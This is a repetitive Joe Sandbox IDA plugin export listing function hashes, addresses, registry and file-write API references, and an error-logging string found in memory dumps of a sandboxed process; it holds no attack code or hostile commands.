Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: c7bbc6c4fc02fbab84f793ef43b03842e8cb9eedb3d504b0ba223d5091b1599e
Instruction ID: 2802ce071b68aa4c671dbc533f1a01735132adc758d41245b6a6795477af3971
Opcode Fuzzy Hash: c7bbc6c4fc02fbab84f793ef43b03842e8cb9eedb3d504b0ba223d5091b1599e
Instruction Fuzzy Hash: 0DF0C2B260868641E752AF00B850BBDA654BF407B4F880237ED1D4B690EFADD989D314

Function 00007FF7C1AB945D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF7C1AB950D

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_get_value, xrefs: 00007FF7C1AB9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB955D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: ebdae4b96f3f95e7b28ed2350476ef876414ddba6212645e21a53aa2eb10d1c1
Instruction ID: 55dfa2ca888506901f1dfd42bef8e8c2eb36cbe499f08f99d7185739e863eeae
Opcode Fuzzy Hash: ebdae4b96f3f95e7b28ed2350476ef876414ddba6212645e21a53aa2eb10d1c1
Instruction Fuzzy Hash: A5F0C2B260878641E752EF00B850BBDA654AF407B4F880237ED1D4B790EFADD989D314

Function 00007FFE11BD54C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11BD545D

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

registry_get_value, xrefs: 00007FFE11BD54A6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11BD54AD

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 9569925857baad9d83274aefa34eeb2a47794240e04e45bf96f4fb7c4f6da266
Instruction ID: 2b1d922870b8a4e11522d38320263b089304f6033be5a4dc0ed6b4e01e1f5293
Opcode Fuzzy Hash: 9569925857baad9d83274aefa34eeb2a47794240e04e45bf96f4fb7c4f6da266
Instruction Fuzzy Hash: F0F0C222609E4682EB669F01B840BB96258AF407B8F08127AED4D466A0EF3DD9899300

Function 00007FFE11BD544C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11BD545D

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

registry_get_value, xrefs: 00007FFE11BD54A6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11BD54AD

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 090d597a9b1f28875ad6d45f6679cbd5da47c45444663eb49efbe71bafab15ff
Instruction ID: b0ad78e084ff3bea241017f0a19f5371ac2c5e0afdfc43087496b4d091f1013a
Opcode Fuzzy Hash: 090d597a9b1f28875ad6d45f6679cbd5da47c45444663eb49efbe71bafab15ff
Instruction Fuzzy Hash: CEF0F62260DE46C2EB669F01B840BF9625CAF407B8F48127AED1D466B0EF3DD985C300

Function 00007FFE11BD543E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11BD545D

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

registry_get_value, xrefs: 00007FFE11BD54A6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11BD54AD

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 7540e1a66fc6686d969aba4d5a662a22a3092066e406f677bd1371b9416a87bc
Instruction ID: f5a24c5d2604c28c85dbb46fcfcfc9db76e6f4ab14373fd96b1f309b6f2af96a
Opcode Fuzzy Hash: 7540e1a66fc6686d969aba4d5a662a22a3092066e406f677bd1371b9416a87bc
Instruction Fuzzy Hash: 1BF0F62260DE46C2EB669F01BC40BF9625CAF407B8F48127AED1D462B0EF3DDA85C300

Function 00007FFE11BD53AD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11BD545D

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

registry_get_value, xrefs: 00007FFE11BD54A6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11BD54AD

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1f1443341065272b26f8778fb621d4f4bce8ddecc7e485dcee93d47f1416b181
Instruction ID: a874fea395f09788b98e54c46d48dc7dd4fa161c8ec5da9421a9e695079e4904
Opcode Fuzzy Hash: 1f1443341065272b26f8778fb621d4f4bce8ddecc7e485dcee93d47f1416b181
Instruction Fuzzy Hash: BAF0F62260DF4AC2EB669F01B840BF9625CAF407B8F48127AED1D462B0EF3DD985C300

Function 00007FFE11BD53B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11BD545D

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

registry_get_value, xrefs: 00007FFE11BD54A6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11BD54AD

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: e638fd45968e93b56570e475a3f40e1af91e8fb340a94d33487af47f6295cefe
Instruction ID: a5ab2e76d18dbbbaf42bc4d887050e94cec06119b76ed3bcd99bef45ef9aad80
Opcode Fuzzy Hash: e638fd45968e93b56570e475a3f40e1af91e8fb340a94d33487af47f6295cefe
Instruction Fuzzy Hash: B5F0C222609E4682EB669F01B840BB96258AF407B8F48127AED1C462A0EF3DD9898300

Function 00007FFE1A4FBC87 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A4FBD2D

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A4FBD7D
registry_get_value, xrefs: 00007FFE1A4FBD76

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 424ba5455938f236fac436dcf4ae9aadb890f1c2ac7e3e5af8e49b89b625ef02
Instruction ID: db43d19751cb65ce27c1e807ae4375d377ac2bbdda315afc80e32071be2c115b
Opcode Fuzzy Hash: 424ba5455938f236fac436dcf4ae9aadb890f1c2ac7e3e5af8e49b89b625ef02
Instruction Fuzzy Hash: F1F0F622708F0645F5528F09BD403B92254EF42BB5F4812F7DE0D866F0EF2DD99A9700

Function 00007FFE1A4FBC7D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A4FBD2D

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A4FBD7D
registry_get_value, xrefs: 00007FFE1A4FBD76

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 2faf2f3caf5ef6f57b80b72ea57377b3f3ff29defbd56a9ac594fe738afb101b
Instruction ID: cf4c55651dae0b42f104f150323be5bd467f082602e9b0bf2ed311b89ad421f1
Opcode Fuzzy Hash: 2faf2f3caf5ef6f57b80b72ea57377b3f3ff29defbd56a9ac594fe738afb101b
Instruction Fuzzy Hash: 57F0C222708F0A45E5528B09BD403B92254EF42BB6F4812F7DE0D866A0EF2DD9969700

Function 00007FFE1A4FBD1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A4FBD2D

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A4FBD7D
registry_get_value, xrefs: 00007FFE1A4FBD76

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 84a45d850fdba3fedfb5a213ccd54f220f83ce82fc5a7113232f6b3206bf8a8c
Instruction ID: e36e7a11ca1abc7a33ca8fe76f6aa617cd06dd71bea6d3570993ac786596f486
Opcode Fuzzy Hash: 84a45d850fdba3fedfb5a213ccd54f220f83ce82fc5a7113232f6b3206bf8a8c
Instruction Fuzzy Hash: 5CF0C222708F0646E5528B09BD403B96254EF42BB5F4812F7DE0D866A0EF2DD9969700

Function 00007FFE1A4FBD0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A4FBD2D

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A4FBD7D
registry_get_value, xrefs: 00007FFE1A4FBD76

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 7a84f77e9ee0064dee28e6b77a36bf4564d917fdea38d4ba1f4fc8436f7b6790
Instruction ID: eeb21dcd2826bdbc18c02589676b4fcc16246ca03a5689db1eb695015f43eab6
Opcode Fuzzy Hash: 7a84f77e9ee0064dee28e6b77a36bf4564d917fdea38d4ba1f4fc8436f7b6790
Instruction Fuzzy Hash: 7DF0C222708F0645E5528B09BD403B92254EF42BB5F4812F7DE0D866A0EF2DD9969700

Function 00007FFE1A4FBD98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1A4FBD2D

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A4FBD7D
registry_get_value, xrefs: 00007FFE1A4FBD76

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: fdaef4cc25d2ac96986bffaf8db08b575f5725428e0afe03a9dd4b28200432cf
Instruction ID: 82a845ba1cf621b26b2de9525f06f3ff835bfe6cbee9829f0394daae77ef823e
Opcode Fuzzy Hash: fdaef4cc25d2ac96986bffaf8db08b575f5725428e0afe03a9dd4b28200432cf
Instruction Fuzzy Hash: 30F0C222708F0645E5528B09BD403B92254EF42BB5F4802F7DE4D866A0EF2DD99A9700

Function 00007FFE126E9CF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126E9D9D

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126E9DED
registry_get_value, xrefs: 00007FFE126E9DE6

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 836da29611261b5cb4dbd78cd3cc8a1c01468ffbe523f58c517336aa61ae090f
Instruction ID: 60ac86a7d86974290c93d1aaa77db12a4775b62addf94d75969356860d5da021
Opcode Fuzzy Hash: 836da29611261b5cb4dbd78cd3cc8a1c01468ffbe523f58c517336aa61ae090f
Instruction Fuzzy Hash: A2F09662609A4642EA52DF02FC403F96255FF447B4F480275ED5D466F4EFADE9498700

Function 00007FFE126E9CED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126E9D9D

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126E9DED
registry_get_value, xrefs: 00007FFE126E9DE6

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: e4929cb0ceebbe4cf362d5102f3a33b2129b4af8d3ac052cf6a09f6a1d38304a
Instruction ID: 1f274714fa9bd80b2a41eb6ab071cc4d3cb1d6c3801248c6fe75071297ee3e5b
Opcode Fuzzy Hash: e4929cb0ceebbe4cf362d5102f3a33b2129b4af8d3ac052cf6a09f6a1d38304a
Instruction Fuzzy Hash: B0F0F622609B0A42EA52DF02BC403F92254EF447B4F080275ED1D466F0EFADE9498300

Function 00007FFE126E9D8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126E9D9D

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126E9DED
registry_get_value, xrefs: 00007FFE126E9DE6

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 70ac4d1a8fc6581fe29d7919f64be475523010afe1560448bc959083e2c7b55a
Instruction ID: 470f087734cac784e2ae8594907938e1ab12fab53415857c302a17654bc23067
Opcode Fuzzy Hash: 70ac4d1a8fc6581fe29d7919f64be475523010afe1560448bc959083e2c7b55a
Instruction Fuzzy Hash: FCF09662609A4642EA52DF02BC403F96255EF447B4F480276ED5D466F4EFADE9498700

Function 00007FFE126E9D7E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE126E9D9D

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126E9DED
registry_get_value, xrefs: 00007FFE126E9DE6

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
